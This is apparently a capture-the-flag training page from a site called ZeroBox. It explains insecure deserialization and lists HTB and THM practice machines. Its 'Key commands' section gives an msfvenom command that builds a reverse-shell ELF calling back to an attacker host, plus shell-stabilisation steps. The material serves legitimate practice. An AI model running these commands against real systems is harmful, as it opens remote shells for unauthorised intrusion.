ZeroBox

Insecure Deserialization: practice machines and key commands

Insecure deserialization lets an attacker supply a crafted serialized object that triggers dangerous code during parsing. It is most common in Java, PHP, Python pickle and .NET applications. Look for serialized blobs in cookies, hidden fields and API bodies: Java streams start with rO0 in base64 and PHP uses readable O:4:"User" strings. Gadget chains in libraries on the classpath do the actual damage, and tools such as ysoserial generate them for Java. Even without a working chain, tampering with a serialized object can change roles or flags. The bug class also shows up in Jenkins, Log4j style JNDI lookups and other Java middleware, where a patched version is the only complete fix. Always confirm the framework version before sending payloads. These machines are good practice for spotting and exploiting the pattern.

Key commands

Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.

msfvenom Linux x64 Staged Reverse TCP ELF

Compile standalone ELF reverse shell binary for x64 Linux target.

msfvenom -p linux/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf -o shell.elf

TTY Interactive Shell Stabilization (Python + stty)

Upgrade dumb reverse shell to fully interactive pseudo-terminal with tab completion and arrow keys.

python3 -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl+Z to background shell
stty raw -echo; fg
export TERM=xterm-256color
stty rows 38 columns 140

Keep going

Insecure Deserialization machines (14)

1 of these are machines I solved myself and are listed first within each difficulty. Machines are matched by their technique tags. 9 Linux, 5 Windows.

Very Easy (2)

MachinePlatformOSTags
PennyworthHTBLinuxJenkins, Groovy, RCE, Default Credentials
UnifiedHTBLinuxLog4j, CVE-2021-44228, UniFi, MongoDB

Easy (3)

MachinePlatformOSTags
AlfredTHMWindowsOSCP, Jenkins, PowerShell, Token Impersonation
BrokerHTBLinuxActiveMQ-CVE-2023-46604, Java-Deserialization, Sudo-Nginx
CraftyHTBWindowsCPTS, Minecraft, Log4j, JNDI

Medium (4)

MachinePlatformOSTags
ArkhamHTBWindowsHTB, Java-Deserialization, UAC-bypass
Jacob the BossTHMLinuxJBoss, Java-Deserialization, CVE-2017-12149, SUID
ScrambledHTBWindowsActive Directory, Deserialization, Deserialization-attacks, Kerberoasting
TimeHTBLinuxCVE-2019-12384, CVE-2019-12814, CVE-2019-14439, CVE-2020-24616

Hard (4)

MachinePlatformOSTags
FelineHTBLinuxCVE-2020-11651, CVE-2020-11652, CVE-2020-9484, Deserialization
InternalTHMLinuxWordPress, Tunneling, Jenkins, Docker-Breakout
MonitorsHTBLinuxCVE-2020-9496, Exploit-modification, HTB, Java-Deserialization
ObjectHTBWindowsHTB, Jenkins

Insane (1)

MachinePlatformOSTags
FattyHTBLinuxDeserialization, HTB, Path-Traversal, SQL-Injection

Related techniques

Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox